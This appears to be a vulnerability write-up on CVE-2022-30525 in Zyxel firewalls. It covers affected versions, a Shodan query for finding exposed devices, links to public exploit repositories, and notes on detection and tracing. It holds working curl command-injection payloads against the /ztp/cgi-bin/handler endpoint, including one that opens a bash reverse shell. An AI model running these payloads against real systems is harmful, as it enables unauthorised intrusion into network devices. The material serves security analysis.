Vulnerability Overview
The Zyxel firewall vulnerability, identified as CVE-2022-30525, arises from errors in processing certain specially crafted data within the CGI program of specific Zyxel firewall versions. This flaw allows attackers to perform unauthenticated system command injection attacks, modify specific files, and ultimately execute arbitrary code.
Affected Versions
5.00 ≤ Zyxel ≤ 5.21
Shodan Search Syntax
title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
Vulnerability Exploit
https://github.com/Henry4E36/CVE-2022-30525
https://github.com/superzerosec/CVE-2022-30525
Vulnerability Reproduction
Zyxel firewalls with this vulnerability are susceptible to unauthenticated remote command injection attacks via the management HTTP interface. Commands are executed as the nobody user. This vulnerability is exploited through the /ztp/cgi-bin/handler URI, passing unfiltered attacker input to os.system in lib_wan_settings.py. The vulnerable function setWanPortSt is associated with the command being called. Attackers can inject arbitrary commands into the mtu or data parameters.
Here, the firewall is made to execute the ping command using curl.
curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler
Using bash for a reverse shell. The official provided bash -c "exec bash -i" did not succeed in testing, so the most basic command is used below.
curl -v --insecure -X POST -H "Content-Type: application/json" -d ' {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged": "1","vlanid":"5","mtu":"; bash -i >& /dev/tcp/192.168.1.2/1234 0>&1;","data":"hi"}' https://192.168.1.1 /ztp/cgi-bin/handler
Using dnslog for batch detection of vulnerable IPs
Traceability Investigation
Currently, there are no logs available for investigation. This payload is located in the post body, and most middleware will not log it. If logs are available, focus on the path /ztp/cgi-bin/handler.
Conclusion
Do not use the official msf provided exploit, none of them were successfully tested. If the status code is 500, the vulnerability exists, but the logic for this determination is not rigorous!
Since the command execution user is nobody, and the firewall’s system architecture is mips64, even if the reverse shell is successful, the user permissions are too low. Currently, there are no available privilege escalation vulnerabilities, so the actual harm caused by this vulnerability is not high.